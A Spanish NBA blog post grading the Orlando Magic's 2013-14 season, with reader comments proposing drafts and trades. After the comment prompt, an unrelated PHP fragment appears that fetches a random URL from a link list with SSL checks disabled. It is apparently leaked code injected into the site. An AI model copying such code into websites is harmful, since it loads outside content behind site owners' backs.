Orlando Magic: Muy deficiente

17 de June de 2014 por TheDeerHunter

Dudando hasta el último momento la calificación final. Podríamos haber por el insuficiente ya que tampoco esperábamos grandes cosas de ellos y ha habido unos cuantos equipos que lo han hecho comparativamente peor. En nuestra previa, sutilmente optimista, les dábamos 10 victorias más aunque tan sólo un par de puestos por encima en la clasificación.  El detalle de competir en una conferencia tan pobre y la sensación de que han dado un paso atrás en su proceso de reconstrucción son dos agravantes demoledores.

Ha sido una temporada extraña marcada por la irregularidad. Capaces, por ejemplo, de ganar consecutivamente a Thunder y Pacers para un par de días después perder contra Milwaukee y Cleveland. Además de las habituales lesiones que siempre les afectan han padecido una indefinición de roles evidente afectando negativamente en el rendimiento general. Tampoco hemos llegado a apreciar un plan de juego claro.  Mucho nos tememos que a pesar de la falta de exigencia en Florida se ha empezado a cuestionar un poco a Jacque Vaughn. Lo peor que le puede pasar a un entrenador en tales circunstancias es no estar atinado en la gestión de los jóvenes. Muy mala señal para dirigir una reconstrucción como la que nos ocupa. 

El mayor aliciente que tenían los aficionados de Orlando esta temporada era precisamente observar el desarrollo de la recién formada columna vertebral. No olvidemos que a la jovencísima plantilla se le unía Victor Oladipo, llamado a ser una de las grandes sensaciones del curso. Lo ha sido a medias porque su elección fue un acierto indiscutible pero no esa nueva versión de Westbrook que algunos auguraban. Ni siquiera se ha hecho con el puesto de titular, seguramente por causas ajenas a él, pero tampoco ha llegado a asimilar del todo el rol de combo-guard que pretendían darle. Nikola Vucevic y Tobias Harris, 23 y 21 años respectivamente, estaban llamados a consolidarse como líderes del proyecto. El primero lo ha sido cuando se lo han permitido las lesiones, pero no hemos visto una gran progresión respecto al curso pasado. Tobias, también propenso a problemas físicos, apenas ha sido titular la mitad de las veces y tampoco hemos llegado a saber si lo quieren de alero, de interior, de referencia absoluta o de revulsivo desde el banco. Campaña un tanto decepcionante la suya después de emocionar a todos cuando llegó a Florida hace un año y medio. De todos modos los grandes perjudicados por tanta incertidumbre ha sido el segundo escalón de promesas. Maurice Harkless, E’Twaun Moore, Kyle O’Quinn y, sobre todo, Andrew Nicholson y Doron Lamb, han sufrido una dosificación de minutos desquiciante y un notable parón en su progreso. Podemos entender que veteranos como Arron Afflalo o Jameer Nelson, por su rendimiento, hayan estado por delante en la rotación pero nos costó asimilar que un Glen Davis con pie y medio fuera y, sobre todo, Jason Maxiell restaran presencia a la nueva hornada.

En este punto hay que repartir un poco las culpas porque desde mediados del curso pasado se especulaba con la salida de los veteranos con mejor cartel. Teniendo en cuenta los objetivos planteados parecía buena idea tratar de obtener réditos acordes a su teórico valor. No cuajó ninguna operación y Glen Davis, quién lo hubiera dicho, terminó saliendo cortado por la puerta de atrás. Nelson y Afflalo han seguido siendo imprescindibles para Vaughn pero paradójicamente su gran aportación y presencia han podido resultar contraproducentes para los intereses de la franquicia.

En definitiva, otro ladrillo más en la reconstrucción pero con cierto sabor a chasco esta temporada. No es probable que se exijan resultados el próximo curso pero sí que se empiece a observar claramente un progreso. Su mercado no permite demasiados años consecutivos de penurias.

PREMIOS

MVP: Nosotros llegamos a elegir a Arron Afflalo (18 ppp – 3.5 r – 3.5 a – 43% T3) para el All Star. Con Wade sufriendo continuos problemas físicos muchos pensamos en él como uno de los dos mejores escoltas del momento en el Este. La mala trayectoria del equipo le privó de estrenarse en el evento pero ha cuajado una campaña impecable. Con el cartel de transferible debería de ser un caramelo para muchas franquicias.

Rookie: Extraordinario Victor Oladipo aunque muchos esperaban todavía más. Posee un físico excelente y una incuestionable ética de trabajo. Deberá usarla para mejorar su lanzamiento y centrar su juego en la posición de escolta. Se supone que le despejarán el camino en ese sentido y el año que viene seguro que veremos más y mejores cosas de él aunque no tenemos del todo claro si está llamado a convertirse en jugador franquicia.

Sorpresa: No lo es tanto para los habituales del blog porque desde hace tiempo hemos oído hablar mucho y bien de él. Los primeros meses Kyle O’Quinn sufrió como pocos el voluble reparto de minutos que le preparó su técnico. Pasó de estar perdido para la causa en Enero a firmar casi 12 puntos, más de 7 rebotes, 2 tapones y medio, 1 asistencia y 1 robo en Abril. Ha demostrado que con confianza y estabilidad es un interior eficaz. De esos no hay tantos.

Decepción: Cuando se fichó a Glen Davis en el 2011, procedente de los Celtics, algunos vieron en él un referente en el proceso de transición que se avecinaba. Jamás lo fue. Por unos motivos o por otros su rendimiento no ha terminado de ser el esperado. Su gran hándicap han sido las lesiones pero justo este curso, cuando no le han afectado, se ha mostrado excesivamente disperso. Su salida tampoco pudo resultar satisfactoria para ninguna de las partes.

Esfuerzo en vano: Nueva dignísima campaña de Jameer Nelson. Sólido como siempre, ha sido imprescindible en las alineaciones de Vaughn, pero no le da para garantizarse un nuevo contrato ni el puesto en el equipo que ha defendido estos 10 años. Toda una carrera en la NBA para depender de una team option y, llegado el caso, de una venta. Ambas ajenas a su rendimiento y profesionalidad.

JUGANDO A GM

El foco de atención en estos momentos es el próximo draft. Disponen de una más que jugosa 4ª elección y también de la 12ª,  suficientes para terminar de perfilar la base del proyecto. Llevan tiempo suspirando por un director de orquesta, y en concreto por Marcus Smart. Tanto él como Dante Exum serían una elección muy coherente pero últimamente también se especula con la posibilidad de asegurar un interior primero y dejar al PG para la siguiente elección. Yo iría a lo seguro con Smart y rezaría porque me cayera Saric. Como será que no Jusuf Nurkic podría dar el perfil que están buscando. En su lugar también podrían optar por un tirador como Zach Lavine o Nik Stauskas, que seguramente tienen un potencial más alto.

Prioritario traspasar a Aarron Afflalo. Mejor ocasión no van a tener y si por una de esas no logran un movimiento satisfactorio tendrán un problema. Sobre Jameer Nelson soy un romántico y, al contrario que la corriente mayoritaria, lo mantendría en el equipo. Por supuesto Kyle O’Quinn debería seguir así como E’Twaun Moore, asumiendo que no serán renovaciones costosas.

Hay margen salarial para repartir pero no una estructura competitiva para atraer un LeBron o un Carmelo. Podrían intentar algo parecido a lo de los Bobcats con Al Jefferson el año pasado pero habría que sobrepagar. De esas ya están escaldados en Florida. Esperaría al verano que viene. Del mercado de agentes libres como mucho captaría algún refuerzo puntual para completar la plantilla.

Salen Jason Maxiell y Ronnie Price. No encuentro demasiados motivos para ejecutar la Team Option sobre Doron Lamb, que no ha contado nunca, pero tanto su presencia como la de Dewayne Dedmon dependerá del perfil que se busque para los últimos flecos. Personalmente preferiría algún que otro veterano para conducir a toda la chavalada.

Por fin, unos Orlando Magic sin contratos tóxicos:

PG: Marcus Smart, Jameer Nelson
SG: Victor Oladipo, E’Twaun Moore
SF: Tobias Harris, Maurice Harkless
PF: Kyle O’Quinn, Andrew Nicholson
C: Nikola Vucevic, Jusuf Nurkic

Comenta

7 comentarios a esta entrada

  1. Denise dice:
    #1

    Gran analisis Deer, me ha gustado. Solo una cosilla, yo no considero decepcionante la campaña de Tobias Harris, estuvo renqueante de una lesión que le impidió jugar los primeros meses.

    Yo lo que haría sería draftear a Noah Vonleh ó a Randle en el pick 4 y ofrecerle un contrato de 8-9 kilos a Eric Bledsoe. Como ésto último no va a suceder porque los Magic no van a apostar fuerte en el mercado de agentes libres, pues jugando a GM haría lo siguiente:

    DRAFT
    • En el pick 4 drafteo a Dante Exum y en el pick 12 a Dario Saric.

    TRADES
    • Afflalo ya ha manifestado que le gustaría jugar para un contender, y Orlando necesita urgentemente un tirador, por lo que traspaso a Afflalo a GSW junto con Andrew Nicholson a cambio de Klay Thompson y Marreese Speights. Creo que la oferta es justa, pero si no lo os parece, no me importaría darle a GSW alguna de las muchas rondas futuras que tenemos desde el trade de Howard. Lo principal es darlo todo por conseguir a uno de los mejores tiradores de la liga.

    AGENTES LIBRES
    • En el mercado de agentes libres, buscaría un base suplente por unos 4 kilos pero que tenga calidad para ser titular en caso de que Exum fracase en su año rookie. Me gustan Sessions, Chalmers, Farmar ó DJ Augustin. Mi primera elección sería Ramon Sessions.
    También reforzaría el PF con Ed Davis, sobre él, los Grizzlies tienen una Qualifying Offer de 4’3 kilos, pero probablemente no la ejecuten y por esa cantidad, incluso algo menos podría ficharlo.

    RENOVACIONES
    Respecto a las renovaciones, a Ronnie Price no lo renuevo, ni tampoco ejecuto el Team Option por Jason Maxiell ni Doron Lamb. En cambio sí que renuevo a E’twaun Moore y a Dewayne Dedmon, ambos por el mínimo.

    CASO JAMEER NELSON
    Respecto a Nelson, tiene un contrato para la próxima temporada de 8 kilos de los cuales, 2 son garantizados, y los otros 6, si no me equivoco, no se convierten en garantizados hasta el 10 de junio. Por tanto, hablaría con el capitán, le pagaría sus 2 kilos garantizados y me lo quedaría en el roster hasta enero, para que tanto en el training camp como en los 2 primeros meses de competición, ejerza de lider y apoyo en el vestuario, llevando por el buen camino a un equipo tan jovén y especialmente siendo mentor del rookie Exum. Una vez que llegue enero, obviamente él es lo suficientemente inteliegente para saber que ese salario ya no lo merece, por lo que le hacemos un homenaje, le rendimos pleitesía agradeciendole todos los servicios prestados durante estos 10 años, y le dejamos ir libre, que fiche por un contender y que gane el anillo.

    Con este equipo, creo que los Magic aspirarían a pelear las últimas plazas de Playoffs, conseguirían un interesantísimo back-court para el futuro, y en 2015 ir a muerte a por un PF all star llamese Lamarcus Aldridge, Kevin Love, Chris Bosh, Al Jefferson ó Paul Millsap

    PG: Exum / Sessions / Nelson (hasta enero)
    SG: Thompson / Oladipo / E’twaun Moore
    SF: Harkless / Saric
    PF: Tobias Harris / Ed Davis / Speights
    C: Vucevic / O’Quinn / Dedmon

      Citar

  2. tysoul dice:
    #2

    como me gustan estos analisis =). Muchas gracias por el trabajo =)

      Citar

  3. txusma dice:
    #3

    Pues la idea de Randle en el 4 y un Elfrid Payton/Tyler Ennis en la 12 no parece tan mala para los Magic.

      Citar

  4. Denise dice:
    #4

    txusma:
    Pues la idea de Randle en el 4 y un Elfrid Payton/Tyler Ennis en la 12 no parece tan mala para los Magic.

    No sería nada mala, no. Aunque me gusta más Vonleh que Randle.

      Citar

  5. TheDeerHunter dice:
    #5

    Denise:
    No considero decepcionante la campaña de Tobias Harris, estuvo renqueante de una lesión que le impidió jugar los primeros meses.

    Bueno… no jugó el primer mes y medio, pero es que después no ha llegado en ningún momento a jugar como el año pasado y tampoco ha sido titular indiscutible como yo diría que todos esperábamos.
    ¿Exáctamente qué papel va a tomar en este equipo? Este curso no se ha aclarado el tema en absoluto.

      Citar

  6. Denise dice:
    #6

    TheDeerHunter: Bueno… no jugó el primer mes y medio, pero es que después no ha llegado en ningún momento a jugar como el año pasado y tampoco ha sido titular indiscutible como yo diría que todos esperábamos.
    ¿Exáctamente qué papel va a tomar en este equipo? Este curso no se ha aclarado el tema en absoluto.

    Bueno, el hecho de que no saliera de titular es lo de menos, porque al igual que Oladipo, cuando salía del banquillo lo hacía para jugar despues más de 30 minutos, en plan 6º hombre.
    Sobre su futuro rol, al hombre lo tienen mareado jugando de 3 ó de 4. A mi de 3 no me gusta, creo que se desaprovecha ya que su tiro exterior es inconsistente, prefiero que juegue de 4 titular, que aunque sea bajo para el puesto, tiene condiciones fisicas de sobra para fajarse en la pintura. Los Magic deberían hacer de él su “Blake Griffin” particular.

      Citar

  7. txusma dice:
    #7

    Si apuestan definitivamente por Harris como 4 titular entonces hay q tirar a por Smart o Exum en la 4ª elección y pq no pillar a Doug McDermoot en la 12 si aún está libre? Sinó la opción para potenciar la posición de 3 serían James Young o Rodney Hood.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>